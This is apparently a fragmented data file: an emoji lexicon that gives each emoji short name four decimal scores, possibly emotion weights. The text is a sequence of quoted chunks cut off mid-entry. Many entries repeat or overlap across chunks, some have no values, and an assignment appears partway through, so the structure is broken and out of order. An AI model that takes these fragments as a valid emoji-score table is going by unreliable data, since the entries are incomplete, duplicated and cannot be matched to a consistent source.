0.309, 0.149, 0.322], \":ant:\": [0.26899999999999996, 0.308, 0.098, 0.11199999999999999], \":envelope_with_arrow:\": [0.251, 0.08800000000000001, 0.063,", "0.193], \":trident_emblem:\": [0.228, 0.14400000000000002, 0.21899999999999997, 0.257], \":five_o’clock:\": [0.126, 0.335, 0.21, 0.264], \":unamused_face:\": [0.418,", "\":tennis:\": [0.174, 0.198, 0.174, 0.327], \":sleeping_face:\": [0.266, 0.23399999999999999, 0.33, 0.255], \":red_paper_lantern:\": [0.111, 0.235,", "0.13699999999999998, 0.214], \":two-hump_camel:\": [0.151, 0.263, 0.131, 0.154], \":white_flower:\": [0.187, 0.141, 0.19, 0.14400000000000002], \":weary_cat_face:\":", "0.201, 0.305], \":magnifying_glass_tilted_right:\": [0.177, 0.253, 0.244, 0.12300000000000001], \":red_circle:\": [0.244, 0.22, 0.11199999999999999, 0.27899999999999997], \":eggplant:\":", "0.203], \":package:\": [0.126, 0.18600000000000003, 0.214, 0.14300000000000002], \":castle:\": [0.069, 0.20199999999999999, 0.132, 0.222], \":bookmark_tabs:\": [0.13699999999999998,", "\":Aquarius:\": [0.17800000000000002, 0.306, 0.23199999999999998, 0.228], \":ear:\": [0.299, 0.33, 0.316, 0.35700000000000004], \":dvd:\": [0.184, 0.14300000000000002,", "\":face_without_mouth:\": [0.34, 0.335, 0.15, 0.359], \":blue_heart:\": [0.14800000000000002, 0.064, 0.28600000000000003, 0.281], \":Japanese_symbol_for_beginner:\": [0.222, 0.121,", "[0.132, 0.10800000000000001, 0.34, 0.265], \":school:\": [0.15, 0.268, 0.29600000000000004, 0.162], \":newspaper:\": [0.222, 0.33799999999999997, 0.27,", "0.179, 0.245, 0.243], \":ice_cream:\": [0.228, 0.18899999999999997, 0.23199999999999998, 0.114], \":bento_box:\": [0.136, 0.16, 0.159, 0.212],", "[0.075, 0.24600000000000002, 0.196, 0.184], \":lipstick:\": [0.276, 0.168, 0.502, 0.141], \":smiling_face_with_halo:\": [0.10800000000000001, 0.092, 0.28,", "0.205, 0.36700000000000005], \":rainbow:\": [0.183, 0.207, 0.317, 0.261], \":microphone:\": [0.121, 0.081, 0.237, 0.29], \":musical_score:\":", "[0.107, 0.292, 0.4, 0.158], \":artist_palette:\": [0.136, 0.11800000000000001, 0.442, 0.057999999999999996], \":battery:\": [0.08199999999999999, 0.179, 0.196,", "0.081, 0.17600000000000002], \":love_hotel:\": [0.040999999999999995, 0.141, 0.22899999999999998, 0.155], \":alien_monster:\": [0.128, 0.228, 0.087, 0.19699999999999998], \":file_folder:\":", "\":grinning_face_with_sweat:\": [0.19, 0.307, 0.23199999999999998, 0.27699999999999997], \":loudly_crying_face:\": [0.24600000000000002, 0.276, 0.198, 0.272], \":hamburger:\": [0.177, 0.122,", "0.155, 0.138], \":bear_face:\": [0.205, 0.256, 0.129, 0.196], \":keycap_10:\": [0.217, 0.109, 0.086, 0.17300000000000001], \":kissing_face_with_closed_eyes:\":", "0.35, 0.08900000000000001, 0.33], \":smiling_face_with_horns:\": [0.213, 0.055, 0.081, 0.193], \":up-left_arrow:\": [0.193, 0.214, 0.18600000000000003, 0.124],", "[0.127, 0.26899999999999996, 0.172, 0.309], \":white_medium-small_square:\": [0.305, 0.22699999999999998, 0.126, 0.187], \":white_large_square:\": [0.348, 0.19399999999999998, 0.155,", "0.139], \":pager:\": [0.14400000000000002, 0.191, 0.22899999999999998, 0.259], \":anxious_face_with_sweat:\": [0.34299999999999997, 0.439, 0.134, 0.35200000000000004], \":tropical_drink:\": [0.14400000000000002,", "[0.198, 0.29600000000000004, 0.287, 0.19699999999999998], \":small_orange_diamond:\": [0.258, 0.162, 0.23399999999999999, 0.271], \":map_of_Japan:\": [0.122, 0.213, 0.24100000000000002,", "0.192, 0.28600000000000003, 0.175], \":musical_notes:\": [0.149, 0.131, 0.326, 0.31], \":open_file_folder:\": [0.213, 0.263, 0.171, 0.276],", "0.28, 0.392, 0.205], \":tangerine:\": [0.16899999999999998, 0.19899999999999998, 0.284, 0.237], \":beer_mug:\": [0.157, 0.12, 0.16699999999999998, 0.09699999999999999],", "\":skull:\": [0.36200000000000004, 0.267, 0.055999999999999994, 0.218], \":pill:\": [0.195, 0.253, 0.182, 0.203], \":package:\": [0.126, 0.18600000000000003,", "[0.195, 0.258, 0.182, 0.225], \":twelve_o’clock:\": [0.18600000000000003, 0.34700000000000003, 0.165, 0.349], \":kimono:\": [0.14400000000000002, 0.196, 0.23800000000000002,", "0.28800000000000003, 0.122], \":currency_exchange:\": [0.159, 0.20800000000000002, 0.127, 0.226], \":house_with_garden:\": [0.115, 0.24, 0.268, 0.153], \":spiral_shell:\":", "0.244, 0.196, 0.299], \":sunrise_over_mountains:\": [0.10300000000000001, 0.28, 0.392, 0.205], \":tangerine:\": [0.16899999999999998, 0.19899999999999998, 0.284, 0.237],", "0.14800000000000002, 0.075, 0.128], \":triangular_ruler:\": [0.198, 0.201, 0.284, 0.168], \":three_o’clock:\": [0.16699999999999998, 0.369, 0.209, 0.282],", "0.147, 0.145, 0.12300000000000001], \":tear-off_calendar:\": [0.139, 0.267, 0.095, 0.299], \":closed_mailbox_with_raised_flag:\": [0.191, 0.10800000000000001, 0.09699999999999999, 0.136],", "\":wavy_dash:\": [0.235, 0.287, 0.253, 0.268], \":bowling:\": [0.07400000000000001, 0.165, 0.073, 0.275], \":oncoming_fist:\": [0.23600000000000002, 0.253,", "[0.153, 0.21, 0.20600000000000002, 0.16], \":man_and_woman_holding_hands:\": [0.075, 0.096, 0.266, 0.131], \":part_alternation_mark:\": [0.203, 0.12300000000000001, 0.201,", "[0.156, 0.23800000000000002, 0.125, 0.057], \":snail:\": [0.162, 0.239, 0.19899999999999998, 0.17], \":cat_face:\": [0.147, 0.185, 0.19699999999999998,", "[0.261, 0.271, 0.33399999999999996, 0.152], \":full_moon:\": [0.17600000000000002, 0.284, 0.312, 0.20800000000000002], \":jack-o-lantern:\": [0.129, 0.327, 0.09,", "\":old_man:\": [0.27, 0.263, 0.276, 0.215], \":calendar:\": [0.174, 0.21, 0.131, 0.225], \":frowning_face_with_open_mouth:\": [0.37, 0.423,", "0.49200000000000005, 0.36], \":chart_increasing_with_yen:\": [0.175, 0.248, 0.305, 0.20800000000000002], \":satellite_antenna:\": [0.204, 0.259, 0.303, 0.27], \":mobile_phone:\":", "0.262], \":Gemini:\": [0.228, 0.132, 0.262, 0.177], \":hibiscus:\": [0.085, 0.218, 0.316, 0.151], \":notebook_with_decorative_cover:\": [0.139,", "0.17300000000000001, 0.14300000000000002, 0.177], \":ledger:\": [0.115, 0.17, 0.256, 0.182], \":shooting_star:\": [0.17600000000000002, 0.16, 0.377, 0.2],", "[0.19399999999999998, 0.327, 0.079, 0.061], \":bookmark:\": [0.257, 0.174, 0.182, 0.289], \":cat_face_with_wry_smile:\": [0.25, 0.083, 0.078,", "[0.10300000000000001, 0.077, 0.051, 0.192], \":clapping_hands:\": [0.21899999999999997, 0.256, 0.18899999999999997, 0.214], \":kiss_mark:\": [0.272, 0.10800000000000001, 0.273,", "[0.33299999999999996, 0.11800000000000001, 0.268, 0.127], \":dizzy:\": [0.233, 0.147, 0.359, 0.134], \":six_o’clock:\": [0.14300000000000002, 0.39299999999999996, 0.16899999999999998,", "0.141], \":scroll:\": [0.254, 0.267, 0.276, 0.235], \":TOP_arrow:\": [0.162, 0.185, 0.205, 0.191], \":fearful_face:\": [0.344,", "\":pool_8_ball:\": [0.257, 0.09, 0.059000000000000004, 0.204], \":no_entry:\": [0.312, 0.445, 0.136, 0.344], \":water_wave:\": [0.106, 0.29,", "0.102], \":person_wearing_turban:\": [0.212, 0.293, 0.302, 0.239], \":crystal_ball:\": [0.16899999999999998, 0.22, 0.354, 0.196], \":moon_viewing_ceremony:\": [0.149,", "[0.175, 0.248, 0.305, 0.20800000000000002], \":satellite_antenna:\": [0.204, 0.259, 0.303, 0.27], \":mobile_phone:\": [0.127, 0.26899999999999996, 0.172,", "[0.177, 0.218, 0.213, 0.106], \":round_pushpin:\": [0.16399999999999998, 0.26899999999999996, 0.14800000000000002, 0.29], \":television:\": [0.322, 0.247, 0.22699999999999998,", "0.07400000000000001, 0.373, 0.10099999999999999], \":dizzy_face:\": [0.34700000000000003, 0.45799999999999996, 0.12300000000000001, 0.361], \":footprints:\": [0.21, 0.21, 0.163, 0.179],", "[0.319, 0.249, 0.141, 0.22699999999999998], \":spade_suit:\": [0.24600000000000002, 0.213, 0.187, 0.27899999999999997], \":performing_arts:\": [0.159, 0.10800000000000001, 0.204,", "\":magnifying_glass_tilted_right:\": [0.177, 0.253, 0.244, 0.12300000000000001], \":red_circle:\": [0.244, 0.22, 0.11199999999999999, 0.27899999999999997], \":eggplant:\": [0.353, 0.23399999999999999,", "\":grinning_face:\": [0.163, 0.17300000000000001, 0.171, 0.18600000000000003], \":girl:\": [0.22699999999999998, 0.16, 0.214, 0.146], \":pushpin:\": [0.299, 0.263,", "\":kissing_cat_face:\": [0.18899999999999997, 0.11900000000000001, 0.215, 0.21], \":backhand_index_pointing_down:\": [0.39299999999999996, 0.196, 0.317, 0.28600000000000003], \":sailboat:\": [0.10400000000000001, 0.225,", "0.23800000000000002], \":honeybee:\": [0.381, 0.285, 0.128, 0.111], \":rabbit_face:\": [0.165, 0.222, 0.217, 0.037000000000000005], \":pensive_face:\": [0.261,", "0.163, 0.158, 0.055], \":fork_and_knife:\": [0.053, 0.078, 0.126, 0.285], \":pile_of_poo:\": [0.35, 0.342, 0.151, 0.446],", "0.201, 0.457, 0.156], \":wheelchair_symbol:\": [0.18, 0.179, 0.09300000000000001, 0.264], \":Ophiuchus:\": [0.213, 0.17, 0.233, 0.228],", "\":bookmark_tabs:\": [0.13699999999999998, 0.228, 0.301, 0.23], \":face_savoring_food:\": [0.128, 0.107, 0.16899999999999998, 0.091], \":woman’s_sandal:\": [0.24600000000000002, 0.23600000000000002,", "0.207, 0.259, 0.243], \":clockwise_vertical_arrows:\": [0.22899999999999998, 0.23399999999999999, 0.23, 0.262], \":green_book:\": [0.154, 0.24, 0.391, 0.107],", "[0.179, 0.16699999999999998, 0.10099999999999999, 0.311], \":club_suit:\": [0.188, 0.228, 0.128, 0.248], \":wavy_dash:\": [0.235, 0.287, 0.253,", "0.132, 0.028999999999999998, 0.20600000000000002], \":collision:\": [0.16899999999999998, 0.16399999999999998, 0.048, 0.2], \":locked_with_pen:\": [0.168, 0.138, 0.19899999999999998, 0.12300000000000001],", "0.129, 0.155], \":running_shoe:\": [0.23199999999999998, 0.094, 0.08900000000000001, 0.185], \":sad_but_relieved_face:\": [0.3, 0.474, 0.145, 0.391], \":Christmas_tree:\":", "\":game_die:\": [0.126, 0.162, 0.09, 0.179], \":person_pouting:\": [0.293, 0.244, 0.196, 0.299], \":sunrise_over_mountains:\": [0.10300000000000001, 0.28,", "0.09300000000000001], \":white_small_square:\": [0.276, 0.22699999999999998, 0.125, 0.161], \":heavy_large_circle:\": [0.154, 0.17800000000000002, 0.122, 0.315], \":cityscape_at_dusk:\": [0.053,", "0.502, 0.141], \":smiling_face_with_halo:\": [0.10800000000000001, 0.092, 0.28, 0.12300000000000001], \":smirking_face:\": [0.258, 0.040999999999999995, 0.096, 0.146], \":face_screaming_in_fear:\":", "\":woman:\": [0.24100000000000002, 0.215, 0.29, 0.142], \":two_hearts:\": [0.172, 0.08800000000000001, 0.38299999999999995, 0.142], \":dollar_banknote:\": [0.21, 0.19,", "0.23199999999999998, 0.091, 0.153], \":four_o’clock:\": [0.165, 0.361, 0.171, 0.282], \":jeans:\": [0.2, 0.109, 0.134, 0.209],", "\":ghost:\": [0.147, 0.201, 0.017, 0.10800000000000001], \":telephone_receiver:\": [0.179, 0.16699999999999998, 0.10099999999999999, 0.311], \":club_suit:\": [0.188, 0.228,", "= { \":person_surfing:\": [0.12, 0.195, 0.08800000000000001, 0.222], \":locked:\": [0.146, 0.141, 0.196, 0.212], \":hammer:\":", "0.213], \":video_camera:\": [0.301, 0.29, 0.235, 0.20199999999999999], \":green_apple:\": [0.16, 0.188, 0.405, 0.102], \":bust_in_silhouette:\": [0.294,", "[0.158, 0.177, 0.27, 0.262], \":Gemini:\": [0.228, 0.132, 0.262, 0.177], \":hibiscus:\": [0.085, 0.218, 0.316,", "[0.157, 0.12, 0.16699999999999998, 0.09699999999999999], \":spouting_whale:\": [0.16, 0.184, 0.09, 0.159], \":crying_face:\": [0.284, 0.385, 0.21,", "[0.065, 0.133, 0.111, 0.18899999999999997], \":trumpet:\": [0.128, 0.17800000000000002, 0.20600000000000002, 0.221], \":mouth:\": [0.245, 0.136, 0.321,", "0.262], \":grinning_face_with_smiling_eyes:\": [0.184, 0.19699999999999998, 0.188, 0.149], \":folded_hands:\": [0.187, 0.17800000000000002, 0.485, 0.35100000000000003], \":musical_note:\": [0.26,", "0.083, 0.172], \":laptop_computer:\": [0.127, 0.23399999999999999, 0.35, 0.255], \":mushroom:\": [0.188, 0.239, 0.21, 0.084], \":grinning_face_with_big_eyes:\":", "[0.147, 0.235, 0.26899999999999996, 0.203], \":face_with_open_mouth:\": [0.271, 0.29, 0.16, 0.295], \":double_exclamation_mark:\": [0.157, 0.125, 0.063,", "[0.20800000000000002, 0.276, 0.773, 0.366], \":cyclone:\": [0.16899999999999998, 0.28800000000000003, 0.177, 0.214], \":black_large_square:\": [0.396, 0.159, 0.222,", "0.23600000000000002], \":blue_book:\": [0.156, 0.191, 0.149, 0.193], \":headphone:\": [0.16699999999999998, 0.14800000000000002, 0.266, 0.316], \":crown:\": [0.33299999999999996,", "0.209, 0.198], \":kissing_cat_face:\": [0.18899999999999997, 0.11900000000000001, 0.215, 0.21], \":backhand_index_pointing_down:\": [0.39299999999999996, 0.196, 0.317, 0.28600000000000003], \":sailboat:\":", "\":snail:\": [0.162, 0.239, 0.19899999999999998, 0.17], \":cat_face:\": [0.147, 0.185, 0.19699999999999998, 0.16699999999999998], \":panda_face:\": [0.069, 0.23199999999999998,", "[0.43799999999999994, 0.17800000000000002, 0.11599999999999999, 0.282], \":crescent_moon:\": [0.098, 0.13699999999999998, 0.287, 0.218], \":ferris_wheel:\": [0.092, 0.168, 0.141,", "0.07400000000000001, 0.259], \":sunrise:\": [0.107, 0.292, 0.4, 0.158], \":artist_palette:\": [0.136, 0.11800000000000001, 0.442, 0.057999999999999996], \":battery:\":", "0.032], \":mouse_face:\": [0.18899999999999997, 0.20800000000000002, 0.136, 0.094], \":person_getting_massage:\": [0.264, 0.23199999999999998, 0.258, 0.282], \":ballot_box_with_check:\": [0.305,", "[0.11900000000000001, 0.128, 0.125, 0.17300000000000001], \":cinema:\": [0.273, 0.207, 0.20600000000000002, 0.218], \":people_with_bunny_ears:\": [0.24100000000000002, 0.11, 0.052000000000000005,", "0.34299999999999997, 0.129, 0.23800000000000002], \":honeybee:\": [0.381, 0.285, 0.128, 0.111], \":rabbit_face:\": [0.165, 0.222, 0.217, 0.037000000000000005],", "0.35, 0.191, 0.298], \":Pisces:\": [0.16899999999999998, 0.17600000000000002, 0.233, 0.239], \":soccer_ball:\": [0.147, 0.332, 0.115, 0.41100000000000003],", "[0.361, 0.212, 0.235, 0.228], \":winking_face:\": [0.098, 0.053, 0.129, 0.171], \":light_bulb:\": [0.237, 0.19899999999999998, 0.306,", "[0.16399999999999998, 0.239, 0.28800000000000003, 0.122], \":currency_exchange:\": [0.159, 0.20800000000000002, 0.127, 0.226], \":house_with_garden:\": [0.115, 0.24, 0.268,", "0.055], \":fork_and_knife:\": [0.053, 0.078, 0.126, 0.285], \":pile_of_poo:\": [0.35, 0.342, 0.151, 0.446], \":large_blue_diamond:\": [0.249,", "[0.305, 0.17800000000000002, 0.226, 0.213], \":high-heeled_shoe:\": [0.278, 0.11900000000000001, 0.23199999999999998, 0.195], \":input_symbols:\": [0.10800000000000001, 0.195, 0.138,", "0.439, 0.134, 0.35200000000000004], \":tropical_drink:\": [0.14400000000000002, 0.17800000000000002, 0.159, 0.11900000000000001], \":baby:\": [0.266, 0.201, 0.457, 0.156],", "0.14300000000000002, 0.43700000000000006, 0.231], \":tropical_fish:\": [0.063, 0.271, 0.14, 0.122], \":paw_prints:\": [0.266, 0.249, 0.129, 0.155],", "\":winking_face:\": [0.098, 0.053, 0.129, 0.171], \":light_bulb:\": [0.237, 0.19899999999999998, 0.306, 0.225], \":computer_disk:\": [0.19399999999999998, 0.187,", "\":crown:\": [0.33299999999999996, 0.11800000000000001, 0.268, 0.127], \":dizzy:\": [0.233, 0.147, 0.359, 0.134], \":six_o’clock:\": [0.14300000000000002, 0.39299999999999996,", "\":page_with_curl:\": [0.201, 0.294, 0.282, 0.27], \":BACK_arrow:\": [0.075, 0.166, 0.062, 0.20199999999999999], \":winking_face_with_tongue:\": [0.126, 0.059000000000000004,", "[0.16699999999999998, 0.157, 0.35100000000000003, 0.141], \":milky_way:\": [0.16699999999999998, 0.201, 0.43700000000000006, 0.22], \":ticket:\": [0.10800000000000001, 0.08199999999999999, 0.10099999999999999,", "0.35200000000000004], \":tropical_drink:\": [0.14400000000000002, 0.17800000000000002, 0.159, 0.11900000000000001], \":baby:\": [0.266, 0.201, 0.457, 0.156], \":wheelchair_symbol:\": [0.18,", "0.155, 0.22899999999999998], \":sparkler:\": [0.10300000000000001, 0.209, 0.221, 0.20600000000000002], \":fish:\": [0.131, 0.16699999999999998, 0.147, 0.102], \":person_wearing_turban:\":", "0.303], \":red_apple:\": [0.251, 0.182, 0.195, 0.121], \":pistol:\": [0.259, 0.38799999999999996, 0.081, 0.128], \":Japanese_secret_button:\": [0.19699999999999998,", "0.20199999999999999], \":green_apple:\": [0.16, 0.188, 0.405, 0.102], \":bust_in_silhouette:\": [0.294, 0.34700000000000003, 0.18600000000000003, 0.27899999999999997], \":woman_dancing:\": [0.11199999999999999,", "0.179, 0.32, 0.249], \":antenna_bars:\": [0.16399999999999998, 0.122, 0.151, 0.132], \":pouting_cat_face:\": [0.45399999999999996, 0.268, 0.11900000000000001, 0.295],", "[0.205, 0.256, 0.129, 0.196], \":keycap_10:\": [0.217, 0.109, 0.086, 0.17300000000000001], \":kissing_face_with_closed_eyes:\": [0.179, 0.08, 0.217,", "\":dashing_away:\": [0.363, 0.18, 0.102, 0.16399999999999998], \":Virgo:\": [0.17, 0.109, 0.264, 0.195], \":fallen_leaf:\": [0.133, 0.16699999999999998,", "0.262, 0.226, 0.251], \":input_numbers:\": [0.174, 0.18600000000000003, 0.21899999999999997, 0.139], \":worried_face:\": [0.349, 0.397, 0.09699999999999999, 0.348],", "0.11800000000000001], \":slot_machine:\": [0.085, 0.16899999999999998, 0.067, 0.23], \":unlocked:\": [0.207, 0.20600000000000002, 0.17, 0.109], \":leaf_fluttering_in_wind:\": [0.231,", "0.308, 0.11, 0.319], \":person_raising_hand:\": [0.068, 0.084, 0.08, 0.156], \":sweat_droplets:\": [0.26, 0.11900000000000001, 0.081, 0.16899999999999998],", "\":person_tipping_hand:\": [0.361, 0.099, 0.19699999999999998, 0.11199999999999999], \":down-right_arrow:\": [0.23, 0.242, 0.10300000000000001, 0.175], \":wedding:\": [0.092, 0.139,", "0.17, 0.285, 0.081], \":chicken:\": [0.16899999999999998, 0.192, 0.218, 0.127], \":sparkling_heart:\": [0.217, 0.068, 0.42200000000000004, 0.163],", "\":oncoming_fist:\": [0.23600000000000002, 0.253, 0.13, 0.273], \":nail_polish:\": [0.418, 0.121, 0.314, 0.099], \":nine_o’clock:\": [0.15, 0.36700000000000005,", "[0.231, 0.19399999999999998, 0.382, 0.139], \":closed_mailbox_with_lowered_flag:\": [0.184, 0.19, 0.109, 0.18100000000000002], \":sleepy_face:\": [0.267, 0.375, 0.205,", "\":magnifying_glass_tilted_left:\": [0.222, 0.276, 0.203, 0.131], \":Sagittarius:\": [0.17, 0.217, 0.21, 0.22], \":fuel_pump:\": [0.375, 0.161,", "\":ogre:\": [0.37, 0.419, 0.109, 0.257], \":chart_increasing:\": [0.22399999999999998, 0.259, 0.42700000000000005, 0.215], \":pouting_face:\": [0.46799999999999997, 0.36200000000000004,", "0.21100000000000002, 0.067, 0.134], \":growing_heart:\": [0.151, 0.067, 0.348, 0.13], \":smiling_face_with_heart-eyes:\": [0.307, 0.18, 0.308, 0.13699999999999998],", "0.168, 0.1], \":running_shirt:\": [0.138, 0.081, 0.20199999999999999, 0.203], \":heart_decoration:\": [0.13699999999999998, 0.046, 0.315, 0.141], \":scroll:\":", "0.213, 0.142], \":clutch_bag:\": [0.12300000000000001, 0.17, 0.253, 0.31], \":hundred_points:\": [0.254, 0.147, 0.145, 0.12300000000000001], \":tear-off_calendar:\":", "0.203, 0.345, 0.193], \":link:\": [0.258, 0.217, 0.179, 0.262], \":grinning_face_with_smiling_eyes:\": [0.184, 0.19699999999999998, 0.188, 0.149],", "0.278], \":OK_hand:\": [0.153, 0.21, 0.20600000000000002, 0.16], \":man_and_woman_holding_hands:\": [0.075, 0.096, 0.266, 0.131], \":part_alternation_mark:\": [0.203,", "0.21600000000000003, 0.11900000000000001, 0.188], \":white_circle:\": [0.22, 0.16399999999999998, 0.121, 0.217], \":old_woman:\": [0.235, 0.299, 0.326, 0.27899999999999997],", "0.392, 0.205], \":tangerine:\": [0.16899999999999998, 0.19899999999999998, 0.284, 0.237], \":beer_mug:\": [0.157, 0.12, 0.16699999999999998, 0.09699999999999999], \":spouting_whale:\":", "[0.24100000000000002, 0.11, 0.052000000000000005, 0.18], \":revolving_hearts:\": [0.2, 0.09699999999999999, 0.42700000000000005, 0.142], \":spaghetti:\": [0.055999999999999994, 0.149, 0.149,", "\":hatching_chick:\": [0.099, 0.171, 0.16, 0.125], \":heavy_dollar_sign:\": [0.203, 0.149, 0.113, 0.228], \":Taurus:\": [0.22, 0.2,", "0.21], \":disappointed_face:\": [0.318, 0.467, 0.131, 0.39399999999999996], \":fireworks:\": [0.051, 0.165, 0.191, 0.165], \":tongue:\": [0.316,", "0.132], \":pouting_cat_face:\": [0.45399999999999996, 0.268, 0.11900000000000001, 0.295], \":index_pointing_up:\": [0.254, 0.233, 0.49200000000000005, 0.36], \":chart_increasing_with_yen:\": [0.175,", "\":page_facing_up:\": [0.196, 0.31, 0.3, 0.29], \":notebook:\": [0.128, 0.14400000000000002, 0.281, 0.174], \":black_square_button:\": [0.361, 0.212,", "0.154, 0.22699999999999998], \":wine_glass:\": [0.046, 0.124, 0.218, 0.059000000000000004], \":octopus:\": [0.098, 0.23399999999999999, 0.19899999999999998, 0.086], \":ring:\":", "\":heavy_large_circle:\": [0.154, 0.17800000000000002, 0.122, 0.315], \":cityscape_at_dusk:\": [0.053, 0.24, 0.259, 0.23399999999999999], \":steaming_bowl:\": [0.183, 0.129,", "\":purse:\": [0.105, 0.196, 0.302, 0.20199999999999999], \":old_man:\": [0.27, 0.263, 0.276, 0.215], \":calendar:\": [0.174, 0.21,", "0.24, 0.259, 0.23399999999999999], \":steaming_bowl:\": [0.183, 0.129, 0.16699999999999998, 0.226], \":factory:\": [0.205, 0.306, 0.24600000000000002, 0.21],", "0.369, 0.209, 0.282], \":sunflower:\": [0.203, 0.243, 0.354, 0.212], \":lady_beetle:\": [0.228, 0.22, 0.20800000000000002, 0.153],", "[0.121, 0.081, 0.237, 0.29], \":musical_score:\": [0.149, 0.09, 0.371, 0.315], \":white_square_button:\": [0.35100000000000003, 0.226, 0.225,", "[0.153, 0.198, 0.19699999999999998, 0.10400000000000001], \":droplet:\": [0.19899999999999998, 0.223, 0.203, 0.248], \":cat_face_with_tears_of_joy:\": [0.43799999999999994, 0.17800000000000002, 0.11599999999999999,", "[0.18600000000000003, 0.34700000000000003, 0.165, 0.349], \":kimono:\": [0.14400000000000002, 0.196, 0.23800000000000002, 0.222], \":broken_heart:\": [0.244, 0.34, 0.19899999999999998,", "0.084], \":no_one_under_eighteen:\": [0.109, 0.136, 0.051, 0.179], \":left-right_arrow:\": [0.32899999999999996, 0.37200000000000005, 0.214, 0.335], \":smiling_cat_face_with_heart-eyes:\": [0.304,", "0.41100000000000003, 0.289], \":wrench:\": [0.25, 0.313, 0.337, 0.13699999999999998], \":hear-no-evil_monkey:\": [0.303, 0.27699999999999997, 0.094, 0.28300000000000003], \":circus_tent:\":", "\":white_medium-small_square:\": [0.305, 0.22699999999999998, 0.126, 0.187], \":white_large_square:\": [0.348, 0.19399999999999998, 0.155, 0.22899999999999998], \":sparkler:\": [0.10300000000000001, 0.209,", "0.165, 0.191, 0.165], \":tongue:\": [0.316, 0.062, 0.136, 0.133], \":videocassette:\": [0.213, 0.25, 0.312, 0.20800000000000002],", "[0.133, 0.16699999999999998, 0.28600000000000003, 0.168], \":top_hat:\": [0.172, 0.214, 0.11199999999999999, 0.207], \":thumbs_up:\": [0.20199999999999999, 0.265, 0.264,", "0.16899999999999998, 0.067, 0.23], \":unlocked:\": [0.207, 0.20600000000000002, 0.17, 0.109], \":leaf_fluttering_in_wind:\": [0.231, 0.19399999999999998, 0.382, 0.139],", "0.217, 0.11599999999999999, 0.109], \":paperclip:\": [0.289, 0.21899999999999997, 0.19399999999999998, 0.231], \":outbox_tray:\": [0.204, 0.22899999999999998, 0.19699999999999998, 0.19399999999999998],", "0.184, 0.11699999999999999, 0.204], \":t-shirt:\": [0.21899999999999997, 0.078, 0.11599999999999999, 0.226], \":purse:\": [0.105, 0.196, 0.302, 0.20199999999999999],", "[0.138, 0.15, 0.191, 0.165], \":bell:\": [0.27, 0.21899999999999997, 0.242, 0.42700000000000005], \":seven_o’clock:\": [0.15, 0.35, 0.08900000000000001,", "0.193, 0.18600000000000003, 0.217], \":Japanese_castle:\": [0.092, 0.23199999999999998, 0.16399999999999998, 0.149], \":chestnut:\": [0.212, 0.16699999999999998, 0.16899999999999998, 0.078],", "0.299], \":downwards_button:\": [0.195, 0.258, 0.182, 0.225], \":twelve_o’clock:\": [0.18600000000000003, 0.34700000000000003, 0.165, 0.349], \":kimono:\": [0.14400000000000002,", "0.21899999999999997, 0.257], \":five_o’clock:\": [0.126, 0.335, 0.21, 0.264], \":unamused_face:\": [0.418, 0.297, 0.11900000000000001, 0.33299999999999996], \":bouquet:\":", "0.10099999999999999, 0.254, 0.23600000000000002], \":up_arrow:\": [0.382, 0.293, 0.21899999999999997, 0.284], \":teacup_without_handle:\": [0.156, 0.237, 0.429, 0.07],", "[0.18899999999999997, 0.11900000000000001, 0.215, 0.21], \":backhand_index_pointing_down:\": [0.39299999999999996, 0.196, 0.317, 0.28600000000000003], \":sailboat:\": [0.10400000000000001, 0.225, 0.142,", "0.196, 0.317, 0.28600000000000003], \":sailboat:\": [0.10400000000000001, 0.225, 0.142, 0.205], \":horse_face:\": [0.254, 0.16399999999999998, 0.078, 0.159],", "0.348, 0.13], \":smiling_face_with_heart-eyes:\": [0.307, 0.18, 0.308, 0.13699999999999998], \":kissing_face:\": [0.215, 0.171, 0.159, 0.272], \":glowing_star:\":", "0.136, 0.177], \":anguished_face:\": [0.309, 0.485, 0.14, 0.369], \":flushed_face:\": [0.281, 0.263, 0.102, 0.231], \":person_frowning:\":", "0.15, 0.191, 0.165], \":bell:\": [0.27, 0.21899999999999997, 0.242, 0.42700000000000005], \":seven_o’clock:\": [0.15, 0.35, 0.08900000000000001, 0.33],", "0.215], \":pouting_face:\": [0.46799999999999997, 0.36200000000000004, 0.07400000000000001, 0.401], \":fish_cake_with_swirl:\": [0.10800000000000001, 0.21600000000000003, 0.355, 0.149], \":cookie:\": [0.11699999999999999,", "0.18100000000000002], \":page_facing_up:\": [0.196, 0.31, 0.3, 0.29], \":notebook:\": [0.128, 0.14400000000000002, 0.281, 0.174], \":black_square_button:\": [0.361,", "0.124], \":joker:\": [0.233, 0.28600000000000003, 0.051, 0.177], \":dolphin:\": [0.107, 0.184, 0.11699999999999999, 0.204], \":t-shirt:\": [0.21899999999999997,", "0.307], \":up-right_arrow:\": [0.19899999999999998, 0.22399999999999998, 0.159, 0.243], \":right_arrow_curving_up:\": [0.262, 0.255, 0.222, 0.22899999999999998], \":pizza:\": [0.142,", "0.171, 0.151, 0.12], \":dango:\": [0.27899999999999997, 0.193, 0.139, 0.054000000000000006], \":doughnut:\": [0.152, 0.259, 0.136, 0.15],", "0.18100000000000002, 0.141, 0.09], \":Japanese_post_office:\": [0.19, 0.309, 0.226, 0.249], \":nose:\": [0.38299999999999995, 0.272, 0.18600000000000003, 0.52],", "0.23399999999999999, 0.35, 0.255], \":mushroom:\": [0.188, 0.239, 0.21, 0.084], \":grinning_face_with_big_eyes:\": [0.19399999999999998, 0.177, 0.21600000000000003, 0.17],", "[0.10300000000000001, 0.254, 0.092, 0.262], \":memo:\": [0.147, 0.235, 0.26899999999999996, 0.203], \":face_with_open_mouth:\": [0.271, 0.29, 0.16,", "0.17], \":grinning_cat_face:\": [0.149, 0.192, 0.145, 0.25], \":hourglass_not_done:\": [0.19699999999999998, 0.31, 0.266, 0.25], \":sun_behind_cloud:\": [0.11199999999999999,", "0.14300000000000002, 0.146, 0.046], \":Japanese_dolls:\": [0.053, 0.14, 0.07, 0.08], \":chart_decreasing:\": [0.28800000000000003, 0.396, 0.294, 0.38299999999999995],", "0.302], \":cooking:\": [0.078, 0.221, 0.139, 0.11800000000000001], \":slot_machine:\": [0.085, 0.16899999999999998, 0.067, 0.23], \":unlocked:\": [0.207,", "\":bouquet:\": [0.09, 0.251, 0.326, 0.18100000000000002], \":page_facing_up:\": [0.196, 0.31, 0.3, 0.29], \":notebook:\": [0.128, 0.14400000000000002,", "0.284, 0.168], \":three_o’clock:\": [0.16699999999999998, 0.369, 0.209, 0.282], \":sunflower:\": [0.203, 0.243, 0.354, 0.212], \":lady_beetle:\":", "[0.092, 0.163, 0.158, 0.055], \":fork_and_knife:\": [0.053, 0.078, 0.126, 0.285], \":pile_of_poo:\": [0.35, 